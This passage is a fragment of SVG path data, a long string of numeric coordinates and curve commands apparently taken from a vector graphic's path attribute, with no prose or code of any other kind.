,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,